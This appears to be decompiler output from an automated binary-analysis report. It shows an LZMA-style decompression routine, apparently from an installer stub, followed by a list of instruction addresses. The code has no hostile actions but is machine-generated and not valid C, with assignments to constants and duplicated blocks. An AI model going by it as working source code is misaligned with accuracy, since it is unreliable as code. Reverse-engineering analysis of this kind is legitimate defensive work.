													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x004066f0
0x004066f0
0x004066f4
0x00406701
0x0040670b
0x00000000
0x004066f6
0x004066f6
0x00406731
0x00406734
0x00406737
0x0040673a
0x0040673a
0x0040673d
0x00406744
0x00406749
0x0040662a
0x0040662d
0x0040699f
0x0040699f
0x0040699f
0x004069a2
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00000000
0x00000000
0x004069f0
0x004069f4
0x00406ba3
0x00406bb9
0x00406bc1
0x00406bc8
0x00406bca
0x00406bd1
0x00406bd5
0x00406bd5
0x00406a00
0x00406a07
0x00406a0f
0x00406a12
0x00406a15
0x00406a15
0x00406a1b
0x00406a1b
0x004061b7
0x004061b7
0x004061b7
0x004061c0
0x00000000
0x00000000
0x004061c6
0x00000000
0x004061d1
0x00000000
0x00000000
0x004061da
0x004061dd
0x004061e0
0x004061e4
0x00000000
0x00000000
0x004061ea
0x004061ed
0x004061ef
0x004061f0
0x004061f3
0x004061f5
0x004061f6
0x004061f8
0x004061fb
0x00406200
0x00406205
0x0040620e
0x00406221
0x00406224
0x00406230
0x00406258
0x0040625a
0x00406268
0x00406268
0x0040626c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040625c
0x0040625c
0x0040625f
0x00406260
0x00406260
0x00000000
0x0040625c
0x00406236
0x0040623b
0x0040623b
0x00406244
0x0040624c
0x0040624f
0x00000000
0x00406255
0x00406255
0x00000000
0x00406255
0x00000000
0x00406272
0x00406272
0x00406276
0x00406b22
0x00000000
0x00406b22
0x0040627f
0x0040628f
0x00406292
0x00406295
0x00406295
0x00406295
0x00406298
0x0040629c
0x00000000
0x00000000
0x0040629e
0x004062a4
0x004062ce
0x004062d4
0x004062db
0x00000000
0x004062db
0x004062aa
0x004062ad
0x004062b2
0x004062b2
0x004062bd
0x004062c5
0x004062c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040630d
0x00406313
0x00406316
0x00406323
0x0040632b
0x0040699f
0x0040699f
0x00000000
0x00000000
0x004062e2
0x004062e2
0x004062e6
0x00406b31
0x00000000
0x00406b31
0x004062f2
0x004062fd
0x004062fd
0x004062fd
0x00406300
0x00406303
0x00406306
0x0040630b
0x00000000
0x00000000
0x00000000
0x00000000
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406333
0x00406335
0x00406338
0x004063a9
0x004063ac
0x004063af
0x004063b6
0x004063c0
0x0040699f
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040699f
0x0040633a
0x0040633e
0x00406341
0x00406343
0x00406346
0x00406349
0x0040634b
0x0040634e
0x00406350
0x00406355
0x00406358
0x0040635b
0x0040635f
0x00406366
0x00406369
0x00406370
0x00406374
0x0040637c
0x0040637c
0x0040637c
0x00406376
0x00406376
0x00406376
0x0040636b
0x0040636b
0x0040636b
0x00406380
0x00406383
0x004063a1
0x004063a3
0x00000000
0x00406385
0x00406385
0x00406388
0x0040638b
0x0040638e
0x00406390
0x00406390
0x00406390
0x00406393
0x00406396
0x00406398
0x00406399
0x0040639c
0x00000000
0x0040639c
0x00000000
0x004065d2
0x004065d6
0x004065f4
0x004065f7
0x004065fe
0x00406601
0x00406604
0x00406607
0x0040660a
0x0040660d
0x0040660f
0x00406616
0x00406617
0x00406619
0x0040661c
0x0040661f
0x00406622
0x00406622
0x00406627
0x00000000
0x00406627
0x004065d8
0x004065db
0x004065de
0x004065e8
0x0040699f
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x00000000
0x0040663c
0x00406640
0x00406663
0x00406666
0x00406669
0x00406673
0x00406642
0x00406642
0x00406645
0x00406648
0x0040664b
0x00406658
0x0040665b
0x0040665b
0x0040699f
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x00000000
0x0040667f
0x00406683
0x00000000
0x00000000
0x00406689
0x0040668d
0x00000000
0x00000000
0x00406693
0x00406695
0x00406699
0x00406699
0x0040669c
0x004066a0
0x00000000
0x00000000
0x00000000
0x00000000
0x00406717
0x0040671b
0x00406722
0x00406725
0x00406728
0x0040671d
0x0040671d
0x0040671d
0x0040672b
0x0040672e
0x00000000
0x00000000
0x004067d7
0x004067d7
0x004067db
0x00406b79
0x00000000
0x00406b79
0x004067e1
0x004067e4
0x004067e7
0x004067eb
0x004067ee
0x004067f4
0x004067f6
0x004067f6
0x004067f6
0x004067f9
0x004067fc
0x00000000
0x00000000
0x004063cc
0x004063cc
0x004063d0
0x00406b3d
0x00000000
0x00406b3d
0x004063d6
0x004063d9
0x004063dc
0x004063e0
0x004063e3
0x004063e9
0x004063eb
0x004063eb
0x004063eb
0x004063ee
0x004063f1
0x004063f1
0x004063f4
0x004063f7
0x00000000
0x00000000
0x004063fd
0x00406403
0x00000000
0x00000000
0x00406409
0x00406409
0x0040640d
0x00406410
0x00406413
0x00406416
0x00406419
0x0040641a
0x0040641d
0x0040641f
0x00406425
0x00406428
0x0040642b
0x0040642e
0x00406431
0x00406434
0x00406437
0x00406453
0x00406456
0x00406459
0x0040645c
0x00406463
0x00406467
0x00406469
0x0040646d
0x00406439
0x00406439
0x0040643d
